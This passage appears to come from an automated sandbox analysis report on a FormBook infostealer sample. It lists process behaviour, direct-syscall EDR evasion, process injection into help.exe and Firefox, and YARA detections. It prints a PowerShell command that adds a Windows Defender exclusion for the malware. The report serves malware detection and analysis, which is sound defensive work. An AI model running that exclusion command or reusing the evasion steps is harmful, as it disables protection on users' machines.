                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C6AA4 mov eax, dword ptr fs:[00000030h]3_2_019C6AA4
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01970AD0 mov eax, dword ptr fs:[00000030h]3_2_01970AD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A4AD0 mov eax, dword ptr fs:[00000030h]3_2_019A4AD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A4AD0 mov eax, dword ptr fs:[00000030h]3_2_019A4AD0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C6ACC mov eax, dword ptr fs:[00000030h]3_2_019C6ACC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C6ACC mov eax, dword ptr fs:[00000030h]3_2_019C6ACC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019C6ACC mov eax, dword ptr fs:[00000030h]3_2_019C6ACC
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AAAEE mov eax, dword ptr fs:[00000030h]3_2_019AAAEE
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AAAEE mov eax, dword ptr fs:[00000030h]3_2_019AAAEE
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FCA11 mov eax, dword ptr fs:[00000030h]3_2_019FCA11
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019ACA38 mov eax, dword ptr fs:[00000030h]3_2_019ACA38
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01994A35 mov eax, dword ptr fs:[00000030h]3_2_01994A35
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01994A35 mov eax, dword ptr fs:[00000030h]3_2_01994A35
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199EA2E mov eax, dword ptr fs:[00000030h]3_2_0199EA2E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019ACA24 mov eax, dword ptr fs:[00000030h]3_2_019ACA24
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1EA60 mov eax, dword ptr fs:[00000030h]3_2_01A1EA60
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980A5B mov eax, dword ptr fs:[00000030h]3_2_01980A5B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980A5B mov eax, dword ptr fs:[00000030h]3_2_01980A5B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976A50 mov eax, dword ptr fs:[00000030h]3_2_01976A50
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQueryVolumeInformationFile: Direct from: 0x776D2F2CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQuerySystemInformation: Direct from: 0x776D48CCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtAllocateVirtualMemory: Direct from: 0x776D48ECJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtOpenSection: Direct from: 0x776D2E0CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtDeviceIoControlFile: Direct from: 0x776D2AECJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtAllocateVirtualMemory: Direct from: 0x776D2BECJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQueryInformationProcess: Direct from: 0x776D2C26Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtResumeThread: Direct from: 0x776D2FBCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtWriteVirtualMemory: Direct from: 0x776D490CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtCreateUserProcess: Direct from: 0x776D371CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtClose: Direct from: 0x776D2B6C
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtAllocateVirtualMemory: Direct from: 0x776D3C9CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtSetInformationThread: Direct from: 0x776C63F9Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQueryAttributesFile: Direct from: 0x776D2E6CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtSetInformationThread: Direct from: 0x776D2B4CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtReadVirtualMemory: Direct from: 0x776D2E8CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtCreateKey: Direct from: 0x776D2C6CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtResumeThread: Direct from: 0x776D36ACJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtMapViewOfSection: Direct from: 0x776D2D1CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtWriteVirtualMemory: Direct from: 0x776D2E3CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtCreateMutant: Direct from: 0x776D35CCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtAllocateVirtualMemory: Direct from: 0x776D2BFCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtDelayExecution: Direct from: 0x776D2DDCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtProtectVirtualMemory: Direct from: 0x776C7B2EJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQuerySystemInformation: Direct from: 0x776D2DFCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtReadFile: Direct from: 0x776D2ADCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtTerminateThread: Direct from: 0x776D2FCCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtQueryInformationToken: Direct from: 0x776D2CACJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtCreateFile: Direct from: 0x776D2FECJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtOpenFile: Direct from: 0x776D2DCCJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtOpenKeyEx: Direct from: 0x776D2B9CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtNotifyChangeKey: Direct from: 0x776D3C2CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtSetInformationProcess: Direct from: 0x776D2C5CJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeNtProtectVirtualMemory: Direct from: 0x776D2F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory written: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeSection loaded: NULL target: C:\Windows\SysWOW64\help.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\help.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\help.exeThread register set: target process: 7072Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\help.exeThread APC queued: target process: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess created: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe "C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe"Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exeProcess created: C:\Windows\SysWOW64\help.exe "C:\Windows\SysWOW64\help.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: vnV7v1GankdEyS2eDT.exe, 00000005.00000002.3290465246.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000005.00000000.911706916.0000000001030000.00000002.00000001.00040000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3290821151.0000000000EA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeQueries volume information: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.mKv3sKQ5Q4E7waF.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.990094154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290778849.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3290725167.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3288875125.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.992572744.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
